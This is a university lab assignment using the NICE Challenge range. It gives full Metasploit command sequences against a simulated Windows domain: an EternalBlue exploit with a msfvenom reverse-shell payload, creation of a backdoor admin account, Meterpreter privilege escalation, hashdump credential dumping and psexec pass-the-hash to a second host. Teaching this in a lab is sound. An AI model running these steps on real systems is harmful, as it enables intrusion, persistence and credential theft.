Lab 9 - NICE Challenge - Professor Shafer Special

Table of Contents

In this lab you are going to use Metasploit to target systems running Microsoft Windows.

  • Environment: Pretty Safe Electronics
  • Challenge Title: Unauthorized Activity Alert (or any challenge in the PSE environment)
  • Access via https://portal.nice-challenge.com/

In this lab, you're going to use the NICE Challenge ecosystem and its virtual machines, but Professor Shafer has gone completely off the rails and wrote a new assignment using the "Pretty Safe Electronics" network. Ignore the NICE challenge self-tests and ignore the NICE submission system - submit this assignment through Canvas.

Activities

Part 1 - Scanning

Log onto the Security-Desk system. It's Kali Linux, just an older release than what you have installed on your own computer.

Do a nmap scan of the domain controller ("AD-Server", short for Active Directory Server, on the network map) from within Metasploit. Tell nmap to include all the details and tests in its scanning. What command do you use?

Deliverables:

  • What nmap command do you use to scan the domain controller?
  • From the 'hosts' view of Metasploit, what is the hostname of the domain controller?
  • From the 'services' view of Metasploit, what version of SSH is the domain controller running? (Include the protocol part too)
  • From the 'services' view of Metasploit, what version of Windows is the domain controller running? (Include the Release and Build part)

Part 2 - Exploit

Search for exploits related to the eternalblue exploit, which is effective on many (unpatched) versions of Windows.

msf6> search eternalblue

Metasploit has a scanner for eternalblue. Let's use that first.

msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> info
msf6> options
msf6> set RHOSTS 172.16.30.55    # RHOSTS, plural, because it could scan many hosts
msf6> exploit
# Scanner will run and report results

Ah, a vulnerability was found! Let's use the eternalblue exploit, then.

Based on instructions How to Exploit Eternalblue to get a Meterpreter Session on Windows Server 2012 R2

Download eternalblue8_exploit.py from https://gist.github.com/worawit (Just use the web browser on security-desk)

Download the eternalblue kernel shellcode eternalblue_x64_kshellcode.asm from https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm (just use the web browser on the security-desk)

Assemble the kernel shellcode (transform the raw assembly code into binary machine code)

$ nasm -f bin eternalblue_x64_kshellcode.asm

Generate a userland shell payload using msfvenom. Note that LHOST and LPORT point to the Security-Desk machine. It's the "local" machine from the perspective of the exploit.

$ msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=172.16.20.55 LPORT=4444

Combine the kernel and userland shellcode

$ cat eternalblue_x64_kshellcode shell_msf.bin > reverse_shell.bin

Set up Metasploit to receive the meterpreter shell as soon as it is running

msf6> use exploit/multi/handler
msf6> set PAYLOAD windows/x64/shell/reverse_tcp
msf6> set LHOST 172.16.20.55   # IP of Security-Desk, which will listen
msf6> set LPORT 4444
msf6> exploit -j    # Run exploit handler as a background job
### Leave this running and waiting

Install Impacket utility that exploit needs to function

# Need to install impacket on Python 2.7, but pip is not installed for that Python version. (System pip is for Python 3.x)
# First install pip, then upgrade the setup tools, then finally install impacket
$ wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
$ sudo python get-pip.py
$ sudo python -m pip install --upgrade setuptools
$ sudo python -m pip install impacket==0.9.22

Run the exploit

$ python eternalblue8_exploit.py 172.16.30.55 reverse_shell.bin 500

What sessions have been created?

msf6> sessions
msf6> sessions -i <num>     # where <num> = Number of session that just opened

Deliverables:

  • Upload a screenshot showing your active shell on the Domain Controller

Part 3 - Post-Exploit

Now that you have initial access to the system, take advantage of it.

Deliverables:

  • What user are you on the domain controller? Use the whoami command.
  • Create a new account on the domain controller with username "evilhacker" and password "pwned". What command did you enter at the shell to accomplish this?
  • Elevate that "evilhacker" user to the administrator group. What command did you enter at the shell to accomplish this?
  • Obtain a list of users on the domain controller at the command line. Upload a screenshot where 'evilhacker' is visible
  • Back in the NICE webportal, launch the remote desktop interface to the domain controller. Log in as 'evilhacker' and provide a screenshot showing 'evilhacker' as your current username as proof of work.

Switch back to the Security-Desk and Metasploit now. Background the running shell (exploit) with CTRL-Z, then enter y when prompted to "Background session?"

Now upgrade your shell to Meterpreter.

msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
msf6> options
msf6> set SESSION <num>   # Where <num> is session you JUST backgrounded
msf6> exploit   # Should see "Meterpreter session <num> opened"
msf6> sessions

Take a screenshot at this point as a deliverable.

Connect to that active Meterpreter session on the domain controller.

msf6> sessions -i <num>   # Where <num> is NEW meterpreter session

There's lots of fun things to do here!

meterpreter>  sysinfo    # Where am I running?  Should be domain controller
meterpreter>  getprivs   # See what permissions we have
meterpreter>  ps         # Process list
meterpreter>  getsystem  # Ensure we're escalated to SYSTEM access, it not already
meterpreter>  migrate <pid>  # Migrate to another process - Look for vds.exe and use its PID
meterpreter>  hashdump

These password hashes are perfect for brute forcing, and are also useful for Windows pass-the-hash attacks (where you don't need the original password, just the hash will suffice).

Deliverables:

  • Submit a screenshot showing both your original shell session and new Meterpreter session active. (Use the sessions command in Metasploit)
  • Submit a screenshot showing the password hashes that exist on the domain controller. (Use the hashdump command in Meterpreter)
  • What is the full hash for UID 500 (the original administrator)? Provide the entire line you get from hashdump.
    Tip: Rather than manually typing it out (error-prone), use the https://cl1p.net website for a basic clipboard between the NICE VM and whatever system you are completing this Canvas assignment on.

Background the meterpreter shell on the domain controller: CTRL-Z, then y

Part 4 - Pass-the-Hash

Let's use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext. This is a "feature" of older versions of Windows.

See Also: https://security.stackexchange.com/questions/141681/can-an-intruder-still-possibly-succeed-with-pass-the-hash-or-pass-the-ticket-on

msf6> use exploit/windows/smb/psexec
msf6> set RHOST 172.16.30.88    # The DATABASE host
msf6> set SMBUser Administrator
msf6> set SMBPass TheHashedPassword
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 172.16.20.55    # Security-Desk
msf6> set LPORT 4445            # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6> exploit -j
msf6> sessions

Deliverables:

  • Submit a screenshot showing all three sessions active. (The original shell to the domain controller, the Meterpreter shell to the domain controller, and the Meterpreter shell to the database).
  • Submit a screenshot showing the output of sysinfo on the database.